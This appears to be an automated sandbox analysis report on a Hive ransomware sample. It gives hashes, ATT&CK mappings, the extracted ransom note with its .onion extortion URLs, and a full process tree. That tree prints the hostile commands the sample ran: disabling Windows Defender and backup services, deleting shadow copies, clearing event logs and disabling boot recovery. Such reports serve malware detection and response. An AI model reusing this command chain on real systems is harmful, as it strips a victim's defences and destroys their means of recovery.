Analysis

  • max time kernel
    133s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    22-11-2021 11:25

General

  • Target

    44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe

  • Size

    2.7MB

  • MD5

    d8d33f00e7124fe123cc2a581000a2e6

  • SHA1

    233ef1e48543dea370f543c08d7c1ff6adba6e47

  • SHA256

    44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442

  • SHA512

    726f6b154804755e7999d7ccdef8c0671d3a3b988dfeb54ca8f7090e791ef27056688aa9473771b85955932117ce0641eb9aca65d7a0e296b61382d5d804cc2b

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Zd66_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: tKQzFbBaNkDD Password: 1baZ9vWfZq4eSQSPJoCE To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.wvjg8 files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe
    "C:\Users\Admin\AppData\Local\Temp\44f8c6a7e5c8af0782cc39e1f6fc51e817ab990649da1d097f948b76d3fde442.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:840
    • C:\Windows\system32\net.exe
      net.exe stop "NetMsmqActivator" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:572
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "NetMsmqActivator" /y
        3⤵
          PID:1504
      • C:\Windows\system32\net.exe
        net.exe stop "SamSs" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1496
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SamSs" /y
          3⤵
            PID:816
        • C:\Windows\system32\net.exe
          net.exe stop "SDRSVC" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1780
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SDRSVC" /y
            3⤵
              PID:1388
          • C:\Windows\system32\net.exe
            net.exe stop "SstpSvc" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1552
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "SstpSvc" /y
              3⤵
                PID:1792
            • C:\Windows\system32\net.exe
              net.exe stop "UI0Detect" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:856
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "UI0Detect" /y
                3⤵
                  PID:1096
              • C:\Windows\system32\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1988
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:828
                • C:\Windows\system32\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1640
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:1244
                  • C:\Windows\system32\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1564
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:388
                    • C:\Windows\system32\sc.exe
                      sc.exe config "NetMsmqActivator" start= disabled
                      2⤵
                        PID:952
                      • C:\Windows\system32\sc.exe
                        sc.exe config "SamSs" start= disabled
                        2⤵
                          PID:1936
                        • C:\Windows\system32\sc.exe
                          sc.exe config "SDRSVC" start= disabled
                          2⤵
                            PID:1556
                          • C:\Windows\system32\sc.exe
                            sc.exe config "SstpSvc" start= disabled
                            2⤵
                              PID:2004
                            • C:\Windows\system32\sc.exe
                              sc.exe config "UI0Detect" start= disabled
                              2⤵
                                PID:916
                              • C:\Windows\system32\sc.exe
                                sc.exe config "VSS" start= disabled
                                2⤵
                                  PID:1060
                                • C:\Windows\system32\sc.exe
                                  sc.exe config "wbengine" start= disabled
                                  2⤵
                                    PID:988
                                  • C:\Windows\system32\sc.exe
                                    sc.exe config "WebClient" start= disabled
                                    2⤵
                                      PID:2000
                                    • C:\Windows\system32\reg.exe
                                      reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                      2⤵
                                        PID:1620
                                      • C:\Windows\system32\reg.exe
                                        reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                        2⤵
                                          PID:1264
                                        • C:\Windows\system32\reg.exe
                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                          2⤵
                                            PID:1492
                                          • C:\Windows\system32\reg.exe
                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                            2⤵
                                              PID:1488
                                            • C:\Windows\system32\reg.exe
                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                              2⤵
                                                PID:240
                                              • C:\Windows\system32\reg.exe
                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:1792
                                                • C:\Windows\system32\reg.exe
                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                  2⤵
                                                    PID:1760
                                                  • C:\Windows\system32\reg.exe
                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:1064
                                                    • C:\Windows\system32\reg.exe
                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:1292
                                                      • C:\Windows\system32\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:992
                                                        • C:\Windows\system32\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:1376
                                                          • C:\Windows\system32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:1748
                                                            • C:\Windows\system32\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                              2⤵
                                                                PID:1976
                                                              • C:\Windows\system32\reg.exe
                                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                2⤵
                                                                  PID:852
                                                                • C:\Windows\system32\reg.exe
                                                                  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                  2⤵
                                                                    PID:1844
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:1312
                                                                    • C:\Windows\system32\schtasks.exe
                                                                      schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                      2⤵
                                                                        PID:1160
                                                                      • C:\Windows\system32\schtasks.exe
                                                                        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                        2⤵
                                                                          PID:620
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                          2⤵
                                                                            PID:816
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                            2⤵
                                                                              PID:280
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                              2⤵
                                                                                PID:1304
                                                                              • C:\Windows\system32\reg.exe
                                                                                reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                2⤵
                                                                                  PID:1268
                                                                                • C:\Windows\system32\reg.exe
                                                                                  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                  2⤵
                                                                                    PID:792
                                                                                  • C:\Windows\system32\reg.exe
                                                                                    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                    2⤵
                                                                                      PID:1864
                                                                                    • C:\Windows\system32\reg.exe
                                                                                      reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                      2⤵
                                                                                        PID:1392
                                                                                      • C:\Windows\system32\reg.exe
                                                                                        reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                        2⤵
                                                                                          PID:1740
                                                                                        • C:\Windows\system32\reg.exe
                                                                                          reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                            PID:1164
                                                                                          • C:\Windows\system32\reg.exe
                                                                                            reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                            2⤵
                                                                                              PID:456
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                              2⤵
                                                                                                PID:1504
                                                                                              • C:\Windows\system32\reg.exe
                                                                                                reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                2⤵
                                                                                                  PID:1280
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  2⤵
                                                                                                    PID:1700
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                    2⤵
                                                                                                    • Modifies security service
                                                                                                    PID:1100
                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                    2⤵
                                                                                                      PID:976
                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                      vssadmin.exe delete shadows /all /quiet
                                                                                                      2⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:928
                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                      wevtutil.exe cl system
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1612
                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                      wevtutil.exe cl security
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1808
                                                                                                    • C:\Windows\system32\wevtutil.exe
                                                                                                      wevtutil.exe cl application
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1980
                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                      wmic.exe SHADOWCOPY /nointeractive
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1040
                                                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                                                      wmic.exe shadowcopy delete
                                                                                                      2⤵
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1396
                                                                                                    • C:\Windows\system32\bcdedit.exe
                                                                                                      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                      2⤵
                                                                                                      • Modifies boot configuration data using bcdedit
                                                                                                      PID:1336
                                                                                                    • C:\Windows\system32\bcdedit.exe
                                                                                                      bcdedit.exe /set {default} recoveryenabled no
                                                                                                      2⤵
                                                                                                      • Modifies boot configuration data using bcdedit
                                                                                                      PID:1348
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                      2⤵
                                                                                                        PID:828
                                                                                                        • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                          3⤵
                                                                                                          • Deletes Windows Defender Definitions
                                                                                                          PID:880
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                        2⤵
                                                                                                          PID:1148
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                            3⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1116
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                          2⤵
                                                                                                            PID:2100
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                              3⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:2120
                                                                                                        • C:\Windows\system32\NOTEPAD.EXE
                                                                                                          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Zd66_HOW_TO_DECRYPT.txt
                                                                                                          1⤵
                                                                                                          • Opens file in notepad (likely ransom note)
                                                                                                          PID:2352

                                                                                                        Network

                                                                                                        MITRE ATT&CK Matrix ATT&CK v6

                                                                                                        Execution

                                                                                                        Command-Line Interface

                                                                                                        1
                                                                                                        T1059

                                                                                                        Persistence

                                                                                                        Modify Existing Service

                                                                                                        2
                                                                                                        T1031

                                                                                                        Defense Evasion

                                                                                                        Impair Defenses

                                                                                                        1
                                                                                                        T1562

                                                                                                        Modify Registry

                                                                                                        2
                                                                                                        T1112

                                                                                                        Disabling Security Tools

                                                                                                        1
                                                                                                        T1089

                                                                                                        Indicator Removal on Host

                                                                                                        1
                                                                                                        T1070

                                                                                                        File Deletion

                                                                                                        2
                                                                                                        T1107

                                                                                                        Credential Access

                                                                                                        Credentials in Files

                                                                                                        1
                                                                                                        T1081

                                                                                                        Collection

                                                                                                        Data from Local System

                                                                                                        1
                                                                                                        T1005

                                                                                                        Impact

                                                                                                        Inhibit System Recovery

                                                                                                        3
                                                                                                        T1490

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                                                                                                          MD5

                                                                                                          058dd4b4298537972a1f0ef20d7da485

                                                                                                          SHA1

                                                                                                          748e2b214a25970432b7c5533f047d4bafc6fcaa

                                                                                                          SHA256

                                                                                                          b68233c3e5ca619cb9aafb60c6307fd10186f30e65e6ff4c1a214e2e177c8c09

                                                                                                          SHA512

                                                                                                          f038ad746f074d3c76a5ea49ed722364a3a8ab87c7e21452815b6fad2ade3f7efa23196bc814d538f5f77414bf72b10f2ff98f25c194667a0044812cde44a62c

                                                                                                        • C:\Users\Admin\Desktop\Zd66_HOW_TO_DECRYPT.txt
                                                                                                          MD5

                                                                                                          4751cb849a7a4216630236f06978f6e6

                                                                                                          SHA1

                                                                                                          0ed868ed9174b96e0c99e6c95e00b594ddaac1fe

                                                                                                          SHA256

                                                                                                          5063d9029b00765d50a1bb8155cbaaba6a99780d2b93f3bf914bff97ff2e6bac

                                                                                                          SHA512

                                                                                                          cb6a5385d9b87de881daf58439682023dce279aed5426fca4e027fdfec6379ed626b7ae2d0ec0211fea9da59a5924904f4bfec7555704996e74eccdba1448d67

                                                                                                        • memory/240-83-0x0000000000000000-mapping.dmp
                                                                                                        • memory/280-98-0x0000000000000000-mapping.dmp
                                                                                                        • memory/388-70-0x0000000000000000-mapping.dmp
                                                                                                        • memory/456-106-0x0000000000000000-mapping.dmp
                                                                                                        • memory/572-55-0x0000000000000000-mapping.dmp
                                                                                                        • memory/620-96-0x0000000000000000-mapping.dmp
                                                                                                        • memory/792-101-0x0000000000000000-mapping.dmp
                                                                                                        • memory/816-97-0x0000000000000000-mapping.dmp
                                                                                                        • memory/816-58-0x0000000000000000-mapping.dmp
                                                                                                        • memory/828-66-0x0000000000000000-mapping.dmp
                                                                                                        • memory/852-92-0x0000000000000000-mapping.dmp
                                                                                                        • memory/856-63-0x0000000000000000-mapping.dmp
                                                                                                        • memory/916-75-0x0000000000000000-mapping.dmp
                                                                                                        • memory/928-112-0x0000000000000000-mapping.dmp
                                                                                                        • memory/952-71-0x0000000000000000-mapping.dmp
                                                                                                        • memory/976-111-0x0000000000000000-mapping.dmp
                                                                                                        • memory/988-77-0x0000000000000000-mapping.dmp
                                                                                                        • memory/992-88-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1040-119-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1060-76-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1064-86-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1096-64-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1100-110-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1116-125-0x0000000002632000-0x0000000002634000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/1116-126-0x0000000002634000-0x0000000002637000-memory.dmp
                                                                                                          Filesize

                                                                                                          12KB

                                                                                                        • memory/1116-123-0x000007FEF2180000-0x000007FEF2CDD000-memory.dmp
                                                                                                          Filesize

                                                                                                          11.4MB

                                                                                                        • memory/1116-131-0x000000000263B000-0x000000000265A000-memory.dmp
                                                                                                          Filesize

                                                                                                          124KB

                                                                                                        • memory/1116-127-0x000000001B870000-0x000000001BB6F000-memory.dmp
                                                                                                          Filesize

                                                                                                          3.0MB

                                                                                                        • memory/1116-124-0x0000000002630000-0x0000000002632000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/1160-95-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1164-105-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1244-68-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1264-80-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1268-100-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1280-108-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1292-87-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1304-99-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1312-94-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1336-121-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1376-89-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1388-60-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1392-103-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1396-120-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1488-82-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1492-81-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1496-57-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1504-56-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1504-107-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1552-61-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1556-73-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1564-69-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1612-113-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1612-114-0x000007FEFB6F1000-0x000007FEFB6F3000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/1620-79-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1640-67-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1700-109-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1740-104-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1748-90-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1760-85-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1780-59-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1792-62-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1792-84-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1808-115-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1844-93-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1864-102-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1936-72-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1976-91-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1980-117-0x0000000000000000-mapping.dmp
                                                                                                        • memory/1988-65-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2000-78-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2004-74-0x0000000000000000-mapping.dmp
                                                                                                        • memory/2120-130-0x000007FEF2180000-0x000007FEF2CDD000-memory.dmp
                                                                                                          Filesize

                                                                                                          11.4MB

                                                                                                        • memory/2120-133-0x0000000002862000-0x0000000002864000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                        • memory/2120-134-0x0000000002864000-0x0000000002867000-memory.dmp
                                                                                                          Filesize

                                                                                                          12KB

                                                                                                        • memory/2120-135-0x000000000286B000-0x000000000288A000-memory.dmp
                                                                                                          Filesize

                                                                                                          124KB

                                                                                                        • memory/2120-132-0x0000000002860000-0x0000000002862000-memory.dmp
                                                                                                          Filesize

                                                                                                          8KB